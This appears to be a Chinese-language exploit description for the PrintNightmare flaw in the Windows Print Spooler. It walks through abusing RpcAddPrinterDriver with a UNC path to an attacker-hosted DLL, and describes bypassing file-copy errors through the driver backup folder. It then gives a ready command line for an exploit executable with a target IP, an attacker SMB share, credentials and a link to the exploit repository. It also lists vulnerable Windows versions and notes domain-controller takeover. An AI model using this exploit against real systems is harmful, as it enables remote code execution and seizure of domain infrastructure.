向服务器添加打印机驱动程序 (RpcAddPrinterDriver)
让我们检查一下关于 RpcAddPrinterDriver 调用的 MS-RPRN:打印系统远程协议。
要将打印机驱动程序(“OEM 打印机驱动程序”)添加或更新到打印服务器(“CORPSERV”),客户端(“TESTCLT”)执行以下步骤。
假设您在那里提供服务的路径
pDataFile =A.dll
pConfigFile =\attackerip\Evil.dll
pDriverPath=C.dll
它将 A、B 和 C 复制到文件夹 C:\Windows\System32\spool\drivers\x64\3\new。然后它将它们复制到 C:\Windows\System32\spool\drivers\x64\3,并加载 C:\Windows\System32\spool\drivers\x64\3\A.dll 和 C:\Windows\System32\ spool\drivers\x64\3\C.dll 进入 Spooler 服务。但是,在最新版本中,Spooler 将检查以确保 A 和 C 不是 UNC 路径。但是由于 B 可以是 UNC 路径,所以我们可以将 pConfigFile 设置为 UNC 路径(evildll)。这将使我们的 evildll Evil.dll 被复制到 C:\Windows\System32\spool\drivers\x64\3\ Evil.dll。然后再次调用 RpcAddPrinterDriver,将 pDataFile 设置为 C:\Windows\System32\spool\drivers\x64\3\Evil.dll。它将加载我们的邪恶 dll。不幸的是,它不起作用。因为如果你在文件夹C:\Windows\System32\spool\drivers\x64\3中设置了A、B、C。文件复制会出现访问冲突。为了绕过这个,我们需要使用驱动程序升级的备份功能。如果我们升级某些驱动程序,旧版本将备份到 C:\Windows\System32\spool\drivers\x64\3\old\1\ 文件夹中。然后我们可以绕过访问冲突并成功将我们的 evil.dll 注入到 spooler 服务中。
成功加载我们的dll:
.\PrintNightmare.exe dc_ip path_to_exp user_name password
Example:
.\PrintNightmare.exe 192.168.5.129 \\192.168.5.197\test\MyExploit.dll user2 test123#
影响版本
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server, version 2004 (Server Core installation)
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
该漏洞可用于实现 LPE 和 RCE。至于 RCE 部分,您需要一个用户在 Spooler 服务上进行身份验证。但是,这在域环境中仍然很重要。由于通常 DC 会启用 Spooler 服务,因此被入侵的域用户可能会利用此漏洞来控制 DC
地址
https://github.com/afwu/PrintNightmare